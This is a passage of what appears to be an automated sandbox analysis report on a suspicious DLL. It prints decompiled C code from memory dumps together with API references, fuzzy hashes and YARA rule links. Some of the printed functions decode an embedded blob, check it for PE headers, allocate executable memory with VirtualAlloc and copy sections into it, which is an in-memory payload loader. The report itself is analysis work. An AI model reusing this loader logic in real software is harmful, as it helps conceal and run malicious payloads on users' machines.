				E6EDB1340(_t161);
				_t309 = _t306 - 0x15c + 0x10;
				_t12 = _v20 + 4; // 0xe96ee680
				if(( *_t12 & 0x000000ff) == 0) {
					E6EDB12B0(__eflags,  &_v128,  &_v104, 0x6ee572f0);
					_v8 = 3;
					E6EDCDC90(__eflags,  &_v292); // executed
					_v8 = 4;
					E6EDB2BC0(__eflags,  &_v176,  &_v128,  &_v104);
					_v8 = 5;
					_t169 = E6EDCDED0(_v20, __eflags,  &_v292); // executed
					 *_v20 = _t169;
					_v36 = E6EDB2BC0(__eflags,  &_v316,  &_v104,  &_v128);
					_v40 = _v36;
					_v8 = 6;
					E6EDCB5D0(_v36,  &_v224, _v40,  &_v176);
					_t314 = _t309 + 0x34;
					_v8 = 8;
					E6EDB1D80( &_v316);
					__eflags =  *_v20;
					if(__eflags != 0) {
						__eflags = E6EDCDA40(_v20, __eflags,  *_v20);
						if(__eflags != 0) {
							_v52 = E6EDB2BC0(__eflags,  &_v364,  &_v224,  &_v104);
							_v56 = _v52;
							_v8 = 9;
							_v60 = E6EDCB5D0(_v56,  &_v340, _v56,  &_v128);
							_v64 = _v60;
							_v8 = 0xa;
							E6EDCB5D0(_v64,  &_v248, _v64,  &_v176);
							_t317 = _t314 + 0x24;
							_v8 = 0xc;
							E6EDB1D80( &_v340);
							_v8 = 0xd;
							E6EDB1D80( &_v364);
							_t187 = E6EDCD650(_v20,  *_v20);
							__eflags = _t187;
							if(_t187 != 0) {
								_v28 =  &_v248;
								_v24 = E6EDB2660(_v28);
								_v72 = E6EDCD2B0(_v28);
								while(1) {
									__eflags = _v24 - _v72;
									if(_v24 == _v72) {
										break;
									}
									_v76 = _v24;
									_push( *_v76);
									E6EE3E6E9(_t228, _t304, _t305);
									_t317 = _t317 + 4;
									_t202 = _v24 + 1;
									__eflags = _t202;
									_v24 = _t202;
								}
								 *(_v20 + 4) = 1;
								_v80 = 0;
								_v8 = 8;
								E6EDB1D80( &_v248);
								_v8 = 5;
								E6EDB1D80( &_v224);
								_v8 = 4;
								E6EDB1D80( &_v176);
								_v8 = 3;
								E6EDCC420( &_v292); // executed
								_v8 = 2;
								E6EDB1D80( &_v128);
								_v8 = 1;
								E6EDB1D80( &_v152);
								_v8 = 0;
								E6EDB1D80( &_v200);
								_v8 = 0xffffffff;
								E6EDB1D80( &_v104);
								_t198 = _v80;
							} else {
								_v68 = 1;
								_v8 = 8;
								E6EDB1D80( &_v248);
								_v8 = 5;
								E6EDB1D80( &_v224);
								_v8 = 4;
								E6EDB1D80( &_v176);
								_v8 = 3;
								E6EDCC420( &_v292);
								_v8 = 2;
								E6EDB1D80( &_v128);
								_v8 = 1;
								E6EDB1D80( &_v152);
								_v8 = 0;
								E6EDB1D80( &_v200);
								_v8 = 0xffffffff;
								E6EDB1D80( &_v104);
								_t198 = _v68;
							}
						} else {
							_v48 = 1;
							_v8 = 5;
							E6EDB1D80( &_v224);
							_v8 = 4;
							E6EDB1D80( &_v176);
							_v8 = 3;
							E6EDCC420( &_v292);
							_v8 = 2;
							E6EDB1D80( &_v128);
							_v8 = 1;
							E6EDB1D80( &_v152);
							_v8 = 0;
							E6EDB1D80( &_v200);
							_v8 = 0xffffffff;
							E6EDB1D80( &_v104);
							_t198 = _v48;
						}
					} else {
						_v44 = 1;
						_v8 = 5;
						E6EDB1D80( &_v224);
						_v8 = 4;
						E6EDB1D80( &_v176);
						_v8 = 3;
						E6EDCC420( &_v292);
						_v8 = 2;
						E6EDB1D80( &_v128);
						_v8 = 1;
						E6EDB1D80( &_v152);
						_v8 = 0;
						E6EDB1D80( &_v200);
						_v8 = 0xffffffff;
						E6EDB1D80( &_v104);
						_t198 = _v44;
					}
				} else {
					_v32 = 0;
					_v8 = 1;
					E6EDB1D80( &_v152);
					_v8 = 0;
					E6EDB1D80( &_v200);
					_v8 = 0xffffffff;
					E6EDB1D80( &_v104);
					_t198 = _v32;
				}
				 *[fs:0x0] = _v16;
				return _t198;
			}

APIs

task.LIBCPMTD ref: 6EDCE3B3
task.LIBCPMTD ref: 6EDCE3C2
task.LIBCPMTD ref: 6EDCE3D1
task.LIBCPMTD ref: 6EDCE481
task.LIBCPMTD ref: 6EDCE49F
task.LIBCPMTD ref: 6EDCE4AE
~.LIBCPMTD ref: 6EDCE4BD
task.LIBCPMTD ref: 6EDCE4C9
task.LIBCPMTD ref: 6EDCE4D8
task.LIBCPMTD ref: 6EDCE4E7
task.LIBCPMTD ref: 6EDCE4F6

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task
String ID:
API String ID: 1384045349-0
Opcode ID: 46963432f1914b24780a67ed54ec66a19d303198298682ea20aab68dcadcc7ab
Instruction ID: 702c39c8aa70a68f4eede7af923c58c691afa2af542018a6523c98201b259921
Opcode Fuzzy Hash: 46963432f1914b24780a67ed54ec66a19d303198298682ea20aab68dcadcc7ab
Instruction Fuzzy Hash: 4ED14BB0C11248DEDB15DBE4C950BEEBBB8AF15348F1489D8D05667281EB746F48CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6EDCDED0, Relevance: 22.7, APIs: 15, Instructions: 207
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6EDCDED0(intOrPtr __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v16;
				intOrPtr* _v20;
				signed short* _v24;
				void* _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				intOrPtr _v44;
				signed short* _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				void* _v72;
				intOrPtr _v76;
				char _v100;
				char _v124;
				signed short* _t117;
				intOrPtr _t122;
				void* _t127;
				void* _t134;
				void* _t151;
				void* _t181;
				intOrPtr _t197;
				intOrPtr _t201;
				intOrPtr _t208;
				void* _t209;
				void* _t213;
				void* _t214;

				_push(0xffffffff);
				_push(E6EE562E5);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t208;
				_t209 = _t208 - 0x6c;
				_v76 = __ecx;
				_t156 =  &_v124;
				E6EDB18A0( &_v124, __eflags, 0x6ee57304);
				_v8 = 0;
				_v36 = 0;
				while(1) {
					_t216 = _v36 - 0xa;
					if(_v36 >= 0xa) {
						break;
					}
					_t151 = E6EE3ACED(_t156, _t216);
					_t156 =  &_v124;
					E6EDB3620( &_v124, _t151);
					_v36 = _v36 + 1;
				}
				E6EDB12B0(__eflags,  &_v100,  &_v124, 0x6ee57308);
				_v8 = 1;
				E6EDB30F0( &_v100);
				_push(E6EDB2660( &_v100));
				E6EDB1340(_t113);
				_v44 = E6EDB3850(_a4);
				_push(_v44); // executed
				_t117 = E6EE3ACE2(); // executed
				_v48 = _t117;
				E6EE37600(_v48, E6EDB37A0(_a4), _v44);
				_t213 = _t209 + 0x20;
				_v28 = 0;
				_v24 = _v48;
				__eflags = ( *_v24 & 0x0000ffff) - 0x5a4d;
				if(( *_v24 & 0x0000ffff) == 0x5a4d) {
					_t32 =  &(_v24[0x1e]); // 0xf5ba5ae9
					_v20 = _v24 +  *_t32;
					__eflags =  *_v20 - 0x4550;
					if( *_v20 == 0x4550) {
						_t122 = _v20;
						__eflags = ( *(_t122 + 4) & 0x0000ffff) - 0x14c;
						if(( *(_t122 + 4) & 0x0000ffff) == 0x14c) {
							_t197 = _v20;
							__eflags =  *(_t197 + 0xe8);
							if( *(_t197 + 0xe8) == 0) {
								_t60 =  &(_v24[0x1e]); // 0xf5ba5ae9
								_t63 =  &(_v24[0x7c]); // 0xf5ba5be1
								_v32 = _t63 +  *_t60;
								_t127 = VirtualAlloc( *(_v20 + 0x34),  *(_v20 + 0x50), 0x3000, 0x40); // executed
								_v28 = _t127;
								__eflags = _v28;
								if(_v28 == 0) {
									do {
										__eflags = 0;
									} while (0 != 0);
									_v28 = VirtualAlloc(0,  *(_v20 + 0x50), 0x3000, 0x40);
								}
								__eflags = _v28;
								if(_v28 != 0) {
									E6EE37600(_v28, _v24,  *((intOrPtr*)(_v20 + 0x54)));
									_t214 = _t213 + 0xc;
									_v40 = 0;
									while(1) {
										_t201 = _v20;
										__eflags = _v40 - ( *(_t201 + 6) & 0x0000ffff);
										if(_v40 >= ( *(_t201 + 6) & 0x0000ffff)) {
											break;
										}
										E6EE37600( *((intOrPtr*)(_v32 + 0xc)) + _v28,  *((intOrPtr*)(_v32 + 0x14)) + _v24,  *((intOrPtr*)(_v32 + 0x10)));
										_t214 = _t214 + 0xc;
										_v32 = _v32 + 0x28;
										_t181 = _v40 + 1;
										__eflags = _t181;
										_v40 = _t181;
									}
									_v72 = _v28;
									_v8 = 0;
									E6EDB1D80( &_v100);
									_v8 = 0xffffffff;
									E6EDB1D80( &_v124);
									_t134 = _v72;
								} else {
									do {
										__eflags = 0;
									} while (0 != 0);
									_v68 = 0;
									_v8 = 0;
									E6EDB1D80( &_v100);
									_v8 = 0xffffffff;
									E6EDB1D80( &_v124);
									_t134 = _v68;
								}
							} else {
								_v64 = 0;
								_v8 = 0;
								E6EDB1D80( &_v100);
								_v8 = 0xffffffff;
								E6EDB1D80( &_v124);
								_t134 = _v64;
							}
						} else {
							do {
								__eflags = 0;
							} while (0 != 0);
							_v60 = 0;
							_v8 = 0;
							E6EDB1D80( &_v100);
							_v8 = 0xffffffff;
							E6EDB1D80( &_v124);
							_t134 = _v60;
						}
					} else {
						_v56 = 0;
						_v8 = 0;
						E6EDB1D80( &_v100);
						_v8 = 0xffffffff;
						E6EDB1D80( &_v124);
						_t134 = _v56;
					}
				} else {
					_v52 = 0;
					_v8 = 0;
					E6EDB1D80( &_v100);
					_v8 = 0xffffffff;
					E6EDB1D80( &_v124);
					_t134 = _v52;
				}
				 *[fs:0x0] = _v16;
				return _t134;
			}

APIs

Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 6EDCDF23
task.LIBCPMTD ref: 6EDCDFB8
task.LIBCPMTD ref: 6EDCDFC7
task.LIBCPMTD ref: 6EDCDFF9
task.LIBCPMTD ref: 6EDCE008
task.LIBCPMTD ref: 6EDCE036
task.LIBCPMTD ref: 6EDCE045

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task$Concurrency::task_continuation_context::task_continuation_context
String ID:
API String ID: 600748487-0
Opcode ID: b4fb25c8364940bcd85c59cc89fcba561a173307a0b6cdc2d452a0282b146fd0
Instruction ID: b1ab12aa86311f1ee59ef84dcaee9d9a720bd62eb314a66bcb29ccf3ec9ea2c2
Opcode Fuzzy Hash: b4fb25c8364940bcd85c59cc89fcba561a173307a0b6cdc2d452a0282b146fd0
Instruction Fuzzy Hash: CA915AB0D14209DFDB04DFE4C895BEEBBB9BF44344F244558E4156B2C0EB34AA45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6EDCD740, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 181
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6EDCD740(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v21;
				void* _v22;
				signed int _v23;
				void* _v24;
				signed int _v25;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				char _v72;
				char _v96;
				intOrPtr _v100;
				char _v104;
				intOrPtr _v108;
				char _v120;
				char _v128;
				char _v152;
				char _v176;
				void* _t102;
				intOrPtr _t105;
				signed char _t109;
				signed int _t127;
				signed int _t172;
				intOrPtr _t190;
				intOrPtr _t191;

				_push(0xffffffff);
				_push(0x6ee56233);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t190;
				_push(__ecx);
				_t191 = _t190 - 0x9c;
				_v20 = _t191;
				_v40 = 0;
				_t3 =  &_v176; // 0x6ee57334
				E6EDB18A0(_t3, __eflags, "z");
				_v8 = 0;
				_v8 = 1;
				_v100 = E6EDB1D00( &_v52, _a8);
				_v8 = 2;
				E6EDB1EB0( &_v52,  &_v104);
				_v56 = 0xa00000 / E6EDB29F0(_a8);
				_v108 = E6EDCC120( &_v72);
				_v8 = 3;
				E6EDB1B00( &_v152);
				_v8 = 4;
				while(1 != 0) {
					E6EDB1B00( &_v96);
					_v8 = 5;
					E6EDB1ED0( &_v52, 1, 1,  &_v96);
					_t109 = E6EDCB5B0( &_v96, 0x6ee57294);
					_t191 = _t191 + 8;
					_v21 = _t109;
					if((_v21 & 0x000000ff) == 0) {
						_v32 = 0;
						while(1) {
							__eflags = _v32 - E6EDB29F0( &_v96);
							if(__eflags >= 0) {
								break;
							}
							E6EDB3620( &_v152,  *(E6EDB2D90( &_v96, _v32)) & 0x000000ff); // executed
							_v36 = 0;
							while(1) {
								__eflags = _v36 - _v56;
								if(_v36 >= _v56) {
									break;
								}
								_v60 = E6EDCC5D0( &_v72,  &_v36);
								E6EDB3620(_v60,  *(E6EDB2D90( &_v96, _v32)) & 0x000000ff); // executed
								_t172 = _v36 + 1;
								__eflags = _t172;
								_v36 = _t172;
							}
							_t127 = _v32 + 1;
							__eflags = _t127;
							_v32 = _t127;
						}
						_v22 = E6EDB26F0( &_v52, __eflags);
						_v23 = _v22;
						__eflags = (_v23 & 0x000000ff) - 0xc3;
						if((_v23 & 0x000000ff) != 0xc3) {
							E6EDB1B70( &_v120, "#4");
							E6EE37B80( &_v120, 0x6ee67f10);
						}
						while(1) {
							_v64 = E6EDCDDB0( &_v52);
							__eflags = _v64 % 0x10;
							if(__eflags == 0) {
								break;
							}
							_v24 = E6EDB26F0( &_v52, __eflags);
							_v25 = _v24;
							__eflags = (_v25 & 0x000000ff) - 0xcc;
							if((_v25 & 0x000000ff) != 0xcc) {
								E6EDB1B70( &_v128, "#3");
								E6EE37B80( &_v128, 0x6ee67f10);
							}
						}
						_v8 = 4;
						E6EDB1D80( &_v96);
						continue;
					} else {
						_v8 = 4;
						E6EDB1D80( &_v96);
					}
					break;
				}
				E6EDB1840(_a4,  &_v152);
				_v40 = _v40 | 0x00000001;
				_v8 = 3;
				E6EDB1D80( &_v152);
				_v8 = 2;
				_t102 = E6EDCC3E0( &_v72); // executed
				_v8 = 1;
				E6EDB1DC0(_t102,  &_v52);
				_v8 = 0xffffffff;
				_t85 =  &_v176; // 0x6ee57334
				E6EDB1D80(_t85);
				_t105 = _a4;
				 *[fs:0x0] = _v16;
				return _t105;
			}

APIs

task.LIBCPMTD ref: 6EDCD822
Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 6EDCD863
Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 6EDCD8A6
std::locale::facet::facet.LIBCPMTD ref: 6EDCD8D4
std::locale::facet::facet.LIBCPMTD ref: 6EDCD926
task.LIBCPMTD ref: 6EDCD942
task.LIBCPMTD ref: 6EDCD96E
task.LIBCPMTD ref: 6EDCD998

Part of subcall function 6EDB1ED0: task.LIBCPMTD ref: 6EDB1EF7

Strings

4sn, xrefs: 6EDCD771, 6EDCD992

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task$Concurrency::task_continuation_context::task_continuation_contextstd::locale::facet::facet
String ID: 4sn
API String ID: 3350167073-723782382
Opcode ID: 71d33cd015628bddbff4682eb20a90c773821d5a4d46e8785999f8473d69910c
Instruction ID: 32bf3305a7afc371b61c0d9aa21befe1f365436cf2ac1540a38e6492b6500312
Opcode Fuzzy Hash: 71d33cd015628bddbff4682eb20a90c773821d5a4d46e8785999f8473d69910c
Instruction Fuzzy Hash: BE71A171C14188DEDF04DFE4DCA0BEEBBB9AF55344F208559E0566B291EB345A08CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6EE369B5, Relevance: 10.6, APIs: 7, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E6EE369B5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;

				_t68 = __edx;
				_push(0x10);
				_push(0x6ee686c8);
				E6EE374F0(__ebx, __edi, __esi);
				_t34 =  *0x6ee78ee4; // 0x1
				if(_t34 > 0) {
					 *0x6ee78ee4 = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E6EE36CB6();
					 *(_t82 - 4) = 1;
					__eflags =  *0x6ee78ee8 - 2;
					if( *0x6ee78ee8 != 2) {
						E6EE37375(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x6ee686f0);
						E6EE374F0(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E6EE36B70( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t41 = E6EE3685B(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t41;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(__eflags != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(__eflags == 0) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_t42 = E6EDB10E0(__eflags,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t42;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(__eflags == 0) {
											_t45 = E6EDB10E0(__eflags,  *((intOrPtr*)(_t82 + 8)), _t42, _t58);
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6EE369B5(_t58, _t68, _t72, _t76, _t25);
											_pop(_t61);
											E6EE36B70( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E6EE3685B(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E6EE36B70( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x6ee78ee4 - _t72; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E6EE36D81(__ebx, _t61, 1, __esi);
						E6EE37340();
						E6EE374C4();
						 *0x6ee78ee8 =  *0x6ee78ee8 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E6EE36A4A();
						_t54 = E6EE36F22(_t61,  *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E6EE36A57();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}

APIs

__RTC_Initialize.LIBCMT ref: 6EE369FC
___scrt_uninitialize_crt.LIBCMT ref: 6EE36A16

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: d1cb551b69073ff865408ad74fbe3409260d76d13df18d134731d97dc8cc0c4c
Instruction ID: 7e821663022c9a5d710ef3089ef7e56ee0822a079fede3009a5ad0d4cedb3087
Opcode Fuzzy Hash: d1cb551b69073ff865408ad74fbe3409260d76d13df18d134731d97dc8cc0c4c
Instruction Fuzzy Hash: 1E417072E2467BAEDB50CFF58840BAE7A79EB4179DF304529E91467250D7708901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EE36A65, Relevance: 7.6, APIs: 5, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E6EE36A65(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;

				_t40 = __edx;
				_push(0xc);
				_push(0x6ee686f0);
				E6EE374F0(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E6EE36B70( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t25 = E6EE3685B(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t25;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(__eflags == 0) {
							goto L16;
						}
						L8:
						_t26 = E6EDB10E0(__eflags,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t26;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(__eflags == 0) {
								_t29 = E6EDB10E0(__eflags,  *((intOrPtr*)(_t47 + 8)), _t26, _t35);
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E6EE369B5(_t35, _t40, _t42, _t45, _t14);
								_pop(_t37);
								E6EE36B70( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E6EE3685B(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E6EE36B70( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(__eflags == 0) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x6ee78ee4 - _t42; // 0x1
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}

APIs

dllmain_raw.LIBCMT ref: 6EE36AA2
dllmain_crt_dispatch.LIBCMT ref: 6EE36AB9
dllmain_raw.LIBCMT ref: 6EE36B01
dllmain_crt_dispatch.LIBCMT ref: 6EE36B14
dllmain_raw.LIBCMT ref: 6EE36B27

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 5169bda4769b04a6bcbeac9475f894d59612bf46a36d6135cc20c42ae48a7cfe
Instruction ID: e1c9e6195ace5432bf10f4ca43cae1cfae9afde97b4c67d3ea322b5238f57ba7
Opcode Fuzzy Hash: 5169bda4769b04a6bcbeac9475f894d59612bf46a36d6135cc20c42ae48a7cfe
Instruction Fuzzy Hash: F72153B1E20577AFDB61CEE5C850AAF3A79DB81798B314529E91457210E331CD01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDCDC90, Relevance: 7.6, APIs: 5, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E6EDCDC90(void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v76;
				char _v100;
				char _v144;
				char _v188;
				char _v232;
				intOrPtr _t39;
				intOrPtr _t44;
				intOrPtr _t50;
				intOrPtr _t79;
				void* _t83;

				_t83 = __eflags;
				_push(0xffffffff);
				_push(0x6ee56290);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t79;
				_v20 = 0;
				E6EDB3520( &_v76);
				_v8 = 0;
				_t39 =  *0x6ee6a028; // 0x17981
				E6EDB34C0( &_v144, _t83, 0x6edb3870, _t39); // executed
				_v8 = 1;
				E6EDCC530( &_v76, _t83,  &_v144); // executed
				_v8 = 0;
				E6EDCC420( &_v144);
				_t44 = E6EDCD740( &_v144, _t83,  &_v100,  &_v76); // executed
				_v24 = _t44;
				_v28 = _v24;
				_v8 = 2;
				E6EDB3460( &_v188, _v28); // executed
				E6EDCC500( &_v76, _t83,  &_v188);
				E6EDCC420( &_v188);
				_v8 = 0;
				E6EDB1D80( &_v100); // executed
				_t50 = E6EDCE7B0(_t83,  &_v232,  &_v76); // executed
				_v32 = _t50;
				E6EDCC500( &_v76, _t83, _v32); // executed
				E6EDCC420( &_v232);
				E6EDCC170(_a4,  &_v76);
				_v20 = _v20 | 0x00000001;
				_v8 = 0xffffffff;
				E6EDCC420( &_v76);
				 *[fs:0x0] = _v16;
				return _a4;
			}

APIs

~.LIBCPMTD ref: 6EDCDCF7

Part of subcall function 6EDCC420: task.LIBCPMTD ref: 6EDCC435

Part of subcall function 6EDCD740: task.LIBCPMTD ref: 6EDCD822
Part of subcall function 6EDCD740: task.LIBCPMTD ref: 6EDCD96E
Part of subcall function 6EDCD740: task.LIBCPMTD ref: 6EDCD998

~.LIBCPMTD ref: 6EDCDD3D
task.LIBCPMTD ref: 6EDCDD49

Part of subcall function 6EDCE7B0: ~.LIBCPMTD ref: 6EDCE8B0
Part of subcall function 6EDCE7B0: task.LIBCPMTD ref: 6EDCE8CB

~.LIBCPMTD ref: 6EDCDD76
~.LIBCPMTD ref: 6EDCDD9A

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task
String ID:
API String ID: 1384045349-0
Opcode ID: 45146cce4d8c010f85e302058b7453ac92c777d210fddd7a571546b39c874ffe
